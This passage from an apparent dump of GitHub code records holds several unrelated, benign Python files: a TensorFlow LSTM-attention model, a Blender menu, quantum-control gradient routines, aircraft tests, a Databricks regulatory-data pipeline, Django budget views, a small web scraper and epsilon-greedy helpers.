lstm_layer(inputs, 64, num1*num2*num3)\r\n lstm_output = tf.reshape(lstm_output, [num1, num2, num3, -1, 64])\r\n lstm_output = lstm_output[:,:,:,-1,:] #bs*seq*5*64\r\n lstm_output = tf.expand_dims(lstm_output,axis=3)\r\n\r\n return lstm_output # outputs: [batch_sie, sequence_len, 5, 3, 64]\r\n \r\n def attn_layer1(self, inputs): #定义底层attention,对三帧的特征进行归纳。\r\n \"\"\"\r\n input: [batch_sie, sequence_len, 5, 3, 64]\r\n output: [batch_sie, sequence_len, 5, 64]\r\n \"\"\"\r\n with tf.variable_scope('layer1'):\r\n shape = inputs.get_shape().as_list()\r\n batch_size, sequence_len, split_num, dim = shape[0], shape[1], shape[2], shape[4]\r\n output = 
tf.layers.dense(inputs, units=dim, activation='tanh') # output: [batch_sie, sequence_len, 5, 3, 64]\r\n output = tf.nn.softmax(tf.layers.dense(output, units=1, activation=None)) # output: [batch_sie, sequence_len, 5, 3, 1]\r\n output = tf.matmul(output, inputs, transpose_a=True) # output: [batch_sie, sequence_len, 5, 1, 64]\r\n output = tf.squeeze(output, squeeze_dims=3) # output: [batch_sie, sequence_len, 5, 64]\r\n \r\n return output\r\n\r\n def lstm_layer2(self, inputs): #语义层\r\n \"\"\"\r\n input: [batch_sie, sequence_len, 5, 64]\r\n ouput: [batch_sie, sequence_len, 5, 128]\r\n \"\"\"\r\n # print(inputs.get_shape())\r\n with tf.variable_scope('layer2'):\r\n shape = tf.shape(inputs)\r\n dim1, dim2, dim3 = shape[0], shape[1], shape[2]\r\n\r\n inputs = tf.reshape(inputs, [dim1*dim2, dim3, 64]) # [batch_sie * sequence_len, 5, 64]\r\n lstm_output, _ = lstm_layer(inputs, 128, dim1*dim2)\r\n lstm_output = tf.reshape(lstm_output, [dim1, dim2, dim3, 128])\r\n \r\n return lstm_output\r\n\r\n def attn_layer2(self, inputs):\r\n \"\"\"\r\n input: [batch_sie, sequence_len, 5, 128]\r\n ouput: [batch_sie, sequence_len, 128]\r\n \"\"\"\r\n with tf.variable_scope('layer2'):\r\n shape = inputs.get_shape().as_list()\r\n dim1, dim2, dim3, dim4 = shape[0], shape[1], shape[2], shape[3]\r\n output = tf.layers.dense(inputs, units=dim4, activation='tanh') # output: [batch_sie, sequence_len, 5, 128]\r\n output = tf.nn.softmax(tf.layers.dense(output, units=1, activation=None)) # output: [batch_sie, sequence_len, 5, 1]\r\n output = tf.matmul(output, inputs, transpose_a=True) # output: [batch_sie, sequence_len, 1, 128]\r\n output = tf.squeeze(output, squeeze_dims=2) # output: [batch_sie, sequence_len, 128]\r\n\r\n return output\r\n\r\n def lstm_layer3(self, inputs): # 字与字层面的连接\r\n \"\"\"\r\n input: [batch_sie, sequence_len, 256]\r\n output: [batch_sie, sequence_len, 256]\r\n \"\"\"\r\n with tf.variable_scope('layer3'):\r\n shape = tf.shape(inputs)\r\n batch_size = shape[0]\r\n\r\n lstm_output, _ = lstm_layer(inputs, 256, batch_size) \r\n\r\n return lstm_output\r\n \r\n def mlp_layer(self, inputs): #(sequence loss层)\r\n \"\"\"\r\n input: [batch_sie, sequence_len, 256]\r\n output: [batch_sie, sequence_len, 30]\r\n \"\"\"\r\n with tf.variable_scope('top_layer'):\r\n output = tf.layers.dense(inputs, units=128, activation='tanh') # [batch_sie, sequence_len, 128]\r\n output = tf.layers.dense(output, units=30, activation=None) # [batch_sie, sequence_len, 30]\r\n \r\n return output\r\n\r\n def build_model(self):\r\n inputs, labels = self.set_placeholder()\r\n\r\n # ====== build your own model ======\r\n\r\n lstm_layer1_output = self.lstm_layer1(inputs) # output: [batch_sie, sequence_len, 5, 3, 64]\r\n attn_layer1_output = self.attn_layer1(lstm_layer1_output) # output: [batch_sie, sequence_len, 5, 64]\r\n lstm_layer2_output = self.lstm_layer2(attn_layer1_output) # output: [batch_sie, sequence_len, 5, 128]\r\n attn_layer2_output = self.attn_layer2(lstm_layer2_output) # output: [batch_sie, sequence_len, 128]\r\n lstm_layer3_output = self.lstm_layer3(attn_layer2_output) # output: [batch_sie, sequence_len, 256]\r\n model_output = self.mlp_layer(lstm_layer3_output)\r\n self.model_output = model_output\r\n\r\n print('flag5')\r\n print(self.model_output.get_shape(),labels.get_shape())\r\n\r\n self.rse = tf.norm(self.model_output - labels)/tf.norm(labels)\r\n self.loss = tf.losses.mean_squared_error(self.model_output , labels)\r\n\r\n # ====== build your own model ======\r\n\r\n\r\n self.params = tf.trainable_variables()\r\n 
self.optimize, self.islfGrad = super(DMAN, self).optimize_normal(\r\n self.loss, self.params)\r\n\r\n\r\n def train(self, sess, train_data, test_data, saver): #训练过程就是减少loss,更新网络的权重\r\n\r\n # aa = np.append(np.zeros([1,17,29]),np.zeros([1,13,29]),axis=1)\r\n\r\n # 分割数据\r\n bt = batcher(train_data, batch_size=self.batch_size,seq_len=self.seqlen,all_block_len=self.all_block_len,history_num = self.history_num)\r\n print(\"-------------begin train------------------\")\r\n min_loss = 9999\r\n cnt = 0\r\n for t_round in range(self.epoch):\r\n loss = []\r\n while(1):\r\n if not bt.has_next():\r\n break\r\n \r\n batch_input, batch_label = bt.next_batch() # [batch_size, dequnce_len, 29]\r\n \r\n # print('flag2')\r\n # print(np.shape(batch_input))\r\n # print(np.shape(batch_label))\r\n\r\n batch_input = input_prepare(batch_input, self.all_block_len) # [batch_size, sequence_len,15, 29]\r\n \r\n # print('flag2.1')\r\n # print(np.shape(batch_input))\r\n # print(np.shape(batch_label))\r\n\r\n feed_dict = {\r\n self.inputs: batch_input,\r\n self.labels: batch_label\r\n }\r\n\r\n # print('flag4')\r\n # print(np.shape(batch_label))\r\n # # print(batch_input)\r\n # tmpp=tf.shape(self.labels)\r\n # print(self.labels.get_shape())\r\n # print(tmpp[0],tmpp[1],tmpp[2])\r\n # batch_input = np.array(batch_input)\r\n # print(type(batch_input),type(batch_label))\r\n # # print(batch_input)\r\n crt_loss, rse, optimize = sess.run([self.loss, self.rse, self.optimize], feed_dict=feed_dict)\r\n loss.append(crt_loss)\r\n # print(lstm.shape)\r\n\r\n mean_loss = np.mean(loss)\r\n rse = np.mean(rse)\r\n print(\"\\nEpoch{}\\ttain-l2loss: {:.6f}, rse: {:.6f}\".format(t_round, mean_loss, rse))\r\n if min_loss > mean_loss:\r\n min_loss = mean_loss\r\n self.save_model(sess, self.model_save_path, self.model_name, saver)\r\n print(\"testing....\")\r\n if t_round%20==0:\r\n self.test(sess, test_data, saver)\r\n cnt += 1\r\n\r\n\r\n def test(self, sess, test_data, saver): # fm_y = sess.run([self.model_output], feed_dict=feed_dict) 就是model.predict,其他是评估 \r\n data_inputs = test_data.inputs\r\n data_labels = test_data.labels\r\n data_names = test_data.names\r\n\r\n # print('falg10: ',data_labels)\r\n if data_labels==0:\r\n # print('flag11')\r\n sh = np.shape(data_inputs)\r\n data_labels = np.zeros([sh[0],sh[1],30])\r\n # print(np.shape(data_labels))\r\n\r\n for i in range(len(data_inputs)):\r\n sequence_len = len(data_inputs[i])\r\n batch_input = np.expand_dims(data_inputs[i], 0) # [1, sequence_len(3600), 29]\r\n batch_label = np.expand_dims(data_labels[i], 0)\r\n name = data_names[i]\r\n\r\n print('flag8.1',np.array(batch_input).shape)\r\n\r\n batch_input = np.concatenate((np.zeros([1,self.history_num,29]),batch_input,np.zeros([1,self.all_block_len-self.history_num-1,29])),axis=1)\r\n sequence_len = sequence_len\r\n\r\n inputs = [input_prepare(batch_input[:, j:j+self.seqlen+self.all_block_len-1, :], self.all_block_len)[0] for j in range(sequence_len-self.seqlen+1)] # [3571, 30, 15, 29]\r\n labels = [batch_label[:, j:j+self.seqlen, :][0] for j in range(sequence_len-self.seqlen+1)] # [3571, 30, 30]\r\n print(np.array(batch_input).shape)\r\n print(np.array(inputs).shape)\r\n print(np.array(labels).shape)\r\n feed_dict = {\r\n self.inputs: inputs, # [3571, 30, 15, 29]\r\n self.labels: labels # [3571, 30, 30]\r\n }\r\n fm_y = sess.run([self.model_output], feed_dict=feed_dict) # [1, 3571, 30, 30]\r\n fm_y = output_handle(fm_y[0])\r\n los = npl.norm(fm_y-data_labels[i])/npl.norm(data_labels[i])\r\n print(\"test {}-loss: {:.6f}\".format(name, 
los))\r\n super(DMAN, self).save_fmy(sess, self.fmy_output_path, fm_y, name, self.gpu_num, self.model_name)\r\n\r\n\r\n def testonly(self, sess, test_data, saver): #只predict,不评估\r\n data_inputs = test_data.inputs\r\n data_names = test_data.names\r\n\r\n for i in range(len(data_inputs)):\r\n sequence_len = len(data_inputs[i])\r\n batch_input = np.expand_dims(data_inputs[i], 0) # [1, sequence_len(3600), 29]\r\n name = data_names[i]\r\n\r\n print('flag8.1',np.array(batch_input).shape)\r\n\r\n batch_input = np.concatenate((np.zeros([1,self.history_num,29]),batch_input,np.zeros([1,self.all_block_len-self.history_num-1,29])),axis=1)\r\n sequence_len = sequence_len\r\n\r\n inputs = [input_prepare(batch_input[:, j:j+self.seqlen+self.all_block_len-1, :], self.all_block_len)[0] for j in range(sequence_len-self.seqlen+1)] # [3571, 30, 15, 29]\r\n \r\n print(np.array(batch_input).shape)\r\n print(np.array(inputs).shape)\r\n feed_dict = {\r\n self.inputs: inputs#, # [3571, 30, 15, 29]\r\n #self.labels: labels # [3571, 30, 30]\r\n }\r\n fm_y = sess.run([self.model_output], feed_dict=feed_dict) # [1, 3571, 30, 30]\r\n fm_y = output_handle(fm_y[0])\r\n # los = npl.norm(fm_y-data_labels[i])/npl.norm(data_labels[i])\r\n print(\"test {}-loss: {:.6f}\".format(name, -1.0))\r\n super(DMAN, self).save_fmy(sess, self.fmy_output_path, fm_y, name, self.gpu_num, self.model_name)\r\n\r\n","repo_name":"zpy78987/Virbot-Deecamp","sub_path":"dmc7_seq15_block6x5_20190810/model/DMAN.py","file_name":"DMAN.py","file_ext":"py","file_size_in_byte":13825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42011925639","text":"# vim:ts=4:et\n# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\n# \n\nimport os\n\nimport bpy\n\nfrom .operators import OBJECT_OT_add_ksp_prop\n\ndef add_prop_menu_func(self, context):\n layout = self.layout\n if len(OBJECT_OT_add_ksp_prop._enum_item_cache) > 10:\n layout.operator_context = 'INVOKE_REGION_WIN'\n layout.operator(OBJECT_OT_add_ksp_prop.bl_idname,\n text=\"KSP Prop...\",\n icon='OUTLINER_OB_GROUP_INSTANCE')\n else:\n layout.operator_menu_enum(OBJECT_OT_add_ksp_prop.bl_idname,\n \"prop_item\", text=\"KSP Prop\",\n icon='OUTLINER_OB_GROUP_INSTANCE')\n\nmenus_to_register = (\n (bpy.types.VIEW3D_MT_add, add_prop_menu_func),\n)\n","repo_name":"taniwha/io_object_mu","sub_path":"prop/menus.py","file_name":"menus.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","stars":112,"dataset":"github-code","pt":"32"} +{"seq_id":"32143469643","text":"import numpy as np\n\nfrom BlochSolver.QuantumSolvers.rotations import rotation_handler as rh\n\n\nclass NumericalMethods:\n\n n_shape = None\n dt = None\n h_bar = None\n h_k = None\n idn_num = None\n j_max = None\n j_min = None\n\n @classmethod\n def load_numerical_settings(cls, control_hamiltonian: np.array, settings: dict, num_settings: dict) -> None:\n cls.dt = settings[\"pulse_time\"]\n cls.h_bar = settings[\"h_bar\"]\n cls.idn_num = num_settings[\"identities\"]\n cls.h_k = control_hamiltonian\n cls.j_min = rh.RotationHandler.get_pulse_detuning(num_settings[\"e_min\"])\n cls.j_max = rh.RotationHandler.get_pulse_detuning(num_settings[\"e_max\"])\n return\n\n @classmethod\n def get_inverse_matrix(cls, matrix: np.array):\n return np.linalg.inv(matrix)\n\n @classmethod\n def get_commutator(cls, operator_a: np.array, operator_b: np.array):\n return np.dot(operator_a, operator_b) - np.dot(operator_b, operator_a)\n\n @classmethod\n def get_matrix_product(cls, operator_a: np.array, operator_b: np.array):\n return np.trace(np.dot(np.conj(operator_a.T), operator_b))\n\n @classmethod\n def get_gradient(cls, back_operators: np.array, forward_operators: np.array):\n grad = np.array(\n [-1 * cls.get_matrix_product(back_op, 1j * cls.dt * cls.get_commutator(cls.h_k, fwd_op))\n if k < cls.n_shape - cls.idn_num\n else -1 * cls.get_matrix_product(back_op, 1j * cls.dt * cls.get_commutator(rh.RotationHandler.idn, fwd_op))\n for k, (back_op, fwd_op) in enumerate(zip(back_operators, forward_operators))])\n return np.real(grad)\n\n @classmethod\n def get_penalty_gradient(cls, backward_operators: np.array, forward_operators: np.array, detunings: np.array):\n penalty_gradient = np.array(\n [-1 * cls.get_matrix_product(back_op, 1j * cls.dt * cls.get_commutator(cls.h_k, fwd_op)) -\n cls.__get_penalty(detunning) if k < cls.n_shape - cls.idn_num\n else\n -1 * cls.get_matrix_product(back_op,\n 1j * cls.dt * cls.get_commutator(rh.RotationHandler.idn,\n fwd_op)) -\n cls.__get_penalty(detunning)\n for k, (back_op, fwd_op, detunning) in enumerate(zip(backward_operators, forward_operators, detunings))])\n return np.real(penalty_gradient)\n\n @classmethod\n def get_propagator_gradient(cls, backward_propagator: np.array, forward_propagator: np.array):\n propagator_gradient = np.array(\n [-1 * cls.get_matrix_product(back_prop, 1j * cls.dt * rh.RotationHandler.get_dot_product(cls.h_k, 
fwd_prop))\n if k < cls.n_shape - cls.idn_num else\n -1 * cls.get_matrix_product(back_prop, 1j * cls.dt *\n rh.RotationHandler.get_dot_product(rh.RotationHandler.idn, fwd_prop))\n for k, (back_prop, fwd_prop) in enumerate(zip(backward_propagator, forward_propagator))])\n return np.real(propagator_gradient)\n\n @classmethod\n def get_penalty_propagator_gradient(cls, backward_propagator: np.array,\n forward_propagator: np.array, detunings: np.array):\n propagator_gradient = np.array(\n [-1 * cls.get_matrix_product(back_prop, 1j * cls.dt * rh.RotationHandler.get_dot_product(cls.h_k, fwd_prop))\n - cls.__get_penalty(detunning) if k < cls.n_shape - cls.idn_num else\n -1 * cls.get_matrix_product(back_prop, 1j * cls.dt *\n rh.RotationHandler.get_dot_product(rh.RotationHandler.idn, fwd_prop))\n - cls.__get_penalty(detunning) for k, (back_prop, fwd_prop, detunning)\n in enumerate(zip(backward_propagator, forward_propagator, detunings))])\n return np.real(propagator_gradient)\n\n @classmethod\n def __get_penalty(cls, j: float):\n if j > cls.j_max:\n return (j - cls.j_max) ** 6 # np.log(np.abs(j-(1+cls.j_max)))\n elif j < cls.j_min:\n return (cls.j_min - j) ** 6 # np.log(-(j - (1+cls.j_min)))\n else:\n return 0\n\n @classmethod\n def get_density_operator(cls, vector_a: np.array):\n return np.outer(vector_a, np.conj(vector_a))\n\n @classmethod\n def get_hermit_sequence(cls, operator_sequence: np.array):\n return np.array([np.conj(operator.T) for operator in operator_sequence])\n","repo_name":"prz3m37/RandomBenchmarking","sub_path":"BlochSolver/QuantumSolvers/numerics/numerical_methods.py","file_name":"numerical_methods.py","file_ext":"py","file_size_in_byte":4516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71422335131","text":"import unittest\nfrom Skymaster.aircraft import Aircraft\nimport os\n\nclass TestJson(unittest.TestCase):\n def test_readjson(self):\n \"\"\"\n Test that the loading works\n \"\"\"\n this_folder = os.path.dirname(os.path.abspath(__file__))\n file_path = os.path.join(this_folder, \"aircraft_data_test.json\")\n obj = Aircraft.fromjsonfile(file_path)\n self.assertEqual(obj.data_dict, { \"aspect ratio\": \"7.18\", \"wingspan\": \"11.63\", \"dihedral\": \"3\",\n \"oswald efficiency\": \"0.8\", \"top speed 1\": {\"weight\": \"4630\",\"speed\" : \"199\"},\n \"top speed 2\": {\"weight\": \"4200\", \"speed\" : \"200\"}})\n\nclass Test_comp_CD0(unittest.TestCase):\n def test_comp_CDO(self):\n \"\"\"\n Testing the computation of CDO in the comp_CDO function\n \"\"\"\n A = 8\n CL = 1\n e = 0.8\n CD = 0.4\n # Got value from a hand computation\n self.assertAlmostEqual(Aircraft.comp_CD0(CL, A, e, CD), 0.3503, places=4)\n\nclass Test_comp_CL_EOM(unittest.TestCase):\n def test_comp_CL_EOM(self):\n \"\"\"\n Testing the computation of CL in the comp_CL_EOM function\n \"\"\"\n Weight = 1000 # N\n rho = 1.04\n V = 50\n S = 10\n\n CL = 0.076923\n # Got value from a hand computation\n self.assertAlmostEqual(Aircraft.comp_CL_EOM(Weight, rho, V, S), CL, places=4)\n\nclass Test_comp_CD_polar(unittest.TestCase):\n def test_comp_CD_polar(self):\n \"\"\"\n Testing the computation of CD in the comp_CD_polar function\n \"\"\"\n A = 8\n CL = 1\n e = 0.8\n CD_0 = 0.03\n\n CD = 0.0797359\n # Got value from a hand computation\n self.assertAlmostEqual(Aircraft.comp_CD_polar(CL, CD_0, A, e), CD, places=4)\n\nclass Test_comp_CD_EOM(unittest.TestCase):\n def test_comp_CD_EOM(self):\n \"\"\"\n Testing the computation of CD in the comp_CD_EOM function\n 
\"\"\"\n thrust = 100\n rho = 1.04\n V = 50\n S = 10\n\n CD = 0.0076923\n # Got value from a hand computation\n self.assertAlmostEqual(Aircraft.comp_CD_EOM(thrust, rho, V, S), CD, places=4)\n\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"fredrhen/DSE_25","sub_path":"test/test_aircraft.py","file_name":"test_aircraft.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25448196839","text":"# Databricks notebook source\n# MAGIC %pip install dbl-waterbear==0.1.1\n\n# COMMAND ----------\n\ntry:\n # the name of the fire entity we want to process\n fire_entity = spark.conf.get(\"fire.entity\")\nexcept:\n raise Exception(\"Please provide [fire.entity] as job configuration\")\n \ntry:\n # where new data file will be received\n fire_event_dir = spark.conf.get(\"fire.events.dir\")\nexcept:\n raise Exception(\"Please provide [fire.events.dir] as job configuration\")\n \ntry:\n # where we can find fire data model\n fire_model = spark.conf.get(\"fire.model.dir\")\nexcept:\n raise Exception(\"Please provide [fire.model.dir] as job configuration\")\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC We retrieve the name of the entity to get the FIRE data model for as well as the directory (distributed file storage) where we expect new raw files to land. These parameters are passed to the delta live table notebook via job configuration as per the screenshot above.\n\n# COMMAND ----------\n\nfrom pyspark.sql import functions as F\nfrom pyspark.sql.functions import udf\nimport dlt\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Schematizing\n# MAGIC Even though records may sometimes \"look\" structured (e.g. JSON files), enforcing a schema is not just a good practice; in enterprise settings, and especially relevant in the space of regulatory compliance, it guarantees any missing field is still expected, unexpected fields are discarded and data types are fully evaluated (e.g. a date should be treated as a date object and not a string). Using FIRE pyspark module, we retrieve the spark schema required to process a given FIRE entity (e.g. collateral) that we apply on a stream of raw records. This process is called data schematization.\n\n# COMMAND ----------\n\nfrom waterbear.convertor import JsonSchemaConvertor\nfire_schema, fire_constraints = JsonSchemaConvertor(fire_model).convert(fire_entity)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Our first step is to retrieve files landing to a distributed file storage using Spark auto-loader (though this framework can easily be extended to read different streams, using a Kafka connector for instance). In continuous mode, files will be processed as they land, `max_files` at a time. In triggered mode, only new files will be processed since last run. Using Delta Live Tables, we ensure the execution and processing of delta increments, preventing organizations from having to maintain complex checkpointing mechanisms to understand what data needs to be processed next; delta live tables seamlessly handles records that haven't yet been processed, first in first out.\n\n# COMMAND ----------\n\n@dlt.create_table()\ndef bronze():\n return (\n spark\n .readStream\n .format('json')\n .schema(fire_schema)\n .load(f'{fire_event_dir}/{fire_entity}')\n )\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Expectations\n# MAGIC Applying a schema is one thing, enforcing its constraints is another. 
Given the schema definition of a FIRE entity, we can detect if a field is required or not. Given an enumeration object, we ensure its values consistency (e.g. country code). In addition to the technical constraints derived from the schema itself, the FIRE model also reports business expectations using e.g. `minimum`, `maximum`, `maxItems` JSON parameters. All these technical and business constraints will be programmatically retrieved from the FIRE model and interpreted as a series of SQL expressions. \n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Our pipeline will evaluate our series of SQL rules against our schematized dataset (i.e. reading from Bronze), dropping record breaching any of our expectations through the `expect_all_or_drop` pattern and reporting on data quality in real time (note that one could simply flag records or fail an entire pipeline using resp. `expect_all` or `expect_all_or_fail`). At any point in time, we have clear visibility in how many records were dropped prior to landing on our silver layer.\n\n# COMMAND ----------\n\n@dlt.create_table()\n@dlt.expect_all_or_drop(fire_constraints)\ndef silver():\n return dlt.read_stream(\"bronze\")\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Invalid records\n# MAGIC In this example, we made the choice to explicitly isolate invalid from valid records to ensure 100% data quality of regulatory data being transmitted. But in order to ensure full compliance (quality AND volume), we should also redirect invalid records to a quarantine table that can be further investigated and replayed if needed.\n\n# COMMAND ----------\n\n@udf('array')\ndef violations(xs, ys):\n return [ys[i] for i, x in enumerate(xs) if not x]\n \nconstraints_expr = F.array([F.expr(x) for x in fire_constraints.values()])\nconstraints_name = F.array([F.lit(x) for x in fire_constraints.keys()])\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Using a simple user defined function, we add an additional field to our original table with the name(s) of failed SQL expressions. The filtered output is sent to a quarantine table so that the union of quarantine and silver equals the volume expected from our bronze layer.\n\n# COMMAND ----------\n\n@dlt.create_table()\ndef quarantine():\n return (\n dlt\n .read_stream(\"bronze\")\n .withColumn(\"_fire\", violations(constraints_expr, constraints_name)) \\\n .filter(F.size(\"_fire\") > 0)\n )\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Take away\n# MAGIC Finally, our pipeline has been orchestrated between Bronze, Silver and Quarantine, ensuring reliability in the transmission and validation of regulatory reports as new records unfold. As represented in the screenshot below, risk analysts have full visibility around number of records being processed in real time. In this specific example, we ensured that our collateral entity is exactly 92.2% complete (quarantine handles the remaining 8%).\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC In the next section, we will demonstrate how organizations can create a simple operation data store to consume delta live tables metrics in real time, as new regulatory data is transmitted. 
Finally, we will demonstrate how delta sharing capability can ensure integrity in the reports being exchanged between FSIs and regulatory bodies.\n","repo_name":"databricks-industry-solutions/reg-reporting","sub_path":"01_fire_dlt.py","file_name":"01_fire_dlt.py","file_ext":"py","file_size_in_byte":6206,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"8435375318","text":"from django.shortcuts import render\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.urls import reverse_lazy\nfrom django.views.generic import ListView, DetailView, CreateView\nfrom .models import Budget, Transaction\nfrom .forms import BudgetForm, TransactionForm\n\n\nclass BudgetListView(LoginRequiredMixin, ListView):\n    template_name = 'budget/budget_list.html'\n    context_object_name = 'budgets'\n    login_url = reverse_lazy('login')\n\n    def get_queryset(self):\n        return Budget.objects.filter(user__username=self.request.user.username)\n\n    def get_context_data(self, **kwargs):\n        context = super().get_context_data(**kwargs)\n        context['budgets'] = Budget.objects.filter(\n            user__username=self.request.user.username)\n        return context\n\n\nclass BudgetDetailView(LoginRequiredMixin, DetailView):\n    template_name = 'budget/budget_detail.html'\n    model = Transaction\n    context_object_name = 'transactions'\n    login_url = reverse_lazy('login')\n    pk_url_kwarg = 'id'\n\n    def get_queryset(self):\n        return Transaction.objects.filter(\n            budget__id=self.kwargs[self.pk_url_kwarg])\n\n    def get_context_data(self, **kwargs):\n        context = super().get_context_data(**kwargs)\n        context['transactions'] = Transaction.objects.filter(\n            budget__id=self.kwargs[self.pk_url_kwarg])\n        return context\n\n\nclass BudgetCreateView(LoginRequiredMixin, CreateView):\n    template_name = 'budget/budget_create.html'\n    model = Budget\n    form_class = BudgetForm\n    success_url = reverse_lazy('budget_list_view')\n    login_url = reverse_lazy('auth_login')\n\n    def form_valid(self, form):\n        \"\"\"Validate form data.\"\"\"\n        form.instance.user = self.request.user\n        return super().form_valid(form)\n\n\nclass TransactionCreateView(LoginRequiredMixin, CreateView):\n    template_name = 'budget/transaction_create.html'\n    model = Transaction\n    form_class = TransactionForm\n    success_url = reverse_lazy('budget_list_view')\n    login_url = reverse_lazy('auth_login')\n\n    def form_valid(self, form):\n        \"\"\"Validate form data.\"\"\"\n        form.instance.user = self.request.user\n        return super().form_valid(form)\n","repo_name":"scott-currie/budget_tool","sub_path":"budgets/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"31863755381","text":"import requests\nimport re\nfrom bs4 import BeautifulSoup as soup\n\ndef watchsearch(st):\n    index = {}\n    for i in range(1, 6):\n        link = \"https://chiaki.site/?/tools/watch_order_groups/type/popular/page/\" + str(i)\n        req = requests.get(link, headers={'User-Agent': 'Mozilla/5.0'})\n        sou = soup(req.content, \"html.parser\")\n        inde = sou.find_all('td', class_='uk-text-truncate')\n        for j in range(len(inde)):\n            x = inde[j].find(\"a\").getText()\n            y = \"https://chiaki.site/\" + inde[j].find(\"a\").attrs[\"href\"]\n            index[x] = y\n    ret = {}\n    keys = list(index.keys())\n    for i in range(len(keys)):\n        ch = re.sub(\"\\\W+\",\"\",keys[i])\n        st = re.sub(\"\\\W+\",\"\",st)\n        if st.lower() in ch.lower():\n            ret[keys[i]] = index[keys[i]]\n    return 
","repo_name":"nkkun/animebot","sub_path":"watchorder.py","file_name":"watchorder.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"17522243644","text":"import random\nimport numpy as np\n\ndef epsilon_greedy(epsilon, num_actions, s, Q_pi):\n    \"\"\"\n    Samples an action for a given state following an e-greedy policy based on the given Q(s,a)\n    :param epsilon: e small\n    :param num_actions: number of actions in environment\n    :param s: state\n    :param Q_pi: [num_states x num_actions] sized matrix of the action value function\n    :return a_greedy[0]: the sampled action (the greedy action with probability 1-epsilon+epsilon/num_actions)\n    \"\"\"\n    # Identify greedy action\n    greedy = np.argmax(Q_pi[s][:])\n\n    # Compute epsilon greedy probabilities\n    weights = np.ones(num_actions)*epsilon/num_actions\n    weights[greedy] = 1-epsilon+epsilon/num_actions\n\n    # Choose action with epsilon greedy weights\n    a_greedy = random.choices(range(num_actions), weights=weights, k=1)\n    return a_greedy[0]\n\n\n\n\ndef epsilon_greedy_pi_star(num_states, Q_pi):\n    \"\"\"\n    Computes the greedy policy for a given Q(s,a) without sampling\n    :param num_states: number of states in env\n    :param Q_pi: [num_states x num_actions] sized matrix of the action value function\n    :return pi_star: [num_states] array with the greedy action for each state\n    \"\"\"\n    pi_star = np.zeros(num_states)\n    # Loop over all states\n    for s in range(num_states):\n        # Identify greedy action\n        greedy = np.argmax(Q_pi[s][:])\n        pi_star[s] = greedy\n\n    return pi_star","repo_name":"uiuc-ae598-rl-2023-spring/hw1-dp-calkins7","sub_path":"epsilon_greedy.py","file_name":"epsilon_greedy.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"8474243216","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n    path('', views.home, name='home'),\n    path('accounts/signup/', views.signup, name='signup'),\n    # videos views\n    # path('videos/', views.videos_index, name='index'),\n    path('videos/private_index/', views.private_index, name='private_index'),\n    path('videos/create/', views.videos_create, name='videos_create'),\n    path('videos//update', views.videos_update, name='videos_update'),\n    path('videos//delete', views.videos_delete, name='videos_delete'),\n    path('experience/drawing', views.drawing, name='drawing'),\n    path('experience/touch', views.touch, name='touch'),\n    path('experience/control', views.control, name='control')\n]","repo_name":"flawgical/movewithabandon","sub_path":"main_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"34460342616","text":"import matplotlib.pyplot as plt\nimport matplotlib.patches as patches\nimport skimage\nimport numpy as np\nfrom skimage import io\nfrom skimage import transform\nfrom Net import conv_nn_plates_light\nfrom PIL import Image\n\nIMG_WIDTH = conv_nn_plates_light.IMG_WIDTH\nIMG_HEIGHT = conv_nn_plates_light.IMG_HEIGHT\nPATH = 'E:/Study/Mallenom/test.jpg'\n\n\ndef normalize(image):\n    return image[0:] / 255\n\n\ndef read(path):\n    image = io.imread(path)\n    return skimage.img_as_float(image)\n\n\ndef read_and_normalize(path):\n    image = transform.resize(read(path), [IMG_HEIGHT, IMG_WIDTH, conv_nn_plates_light.CHANNELS], mode='reflect')\n    return image\n\n\ndef show_image(image, coords, width, height, original=None):\n    fig, ax = 
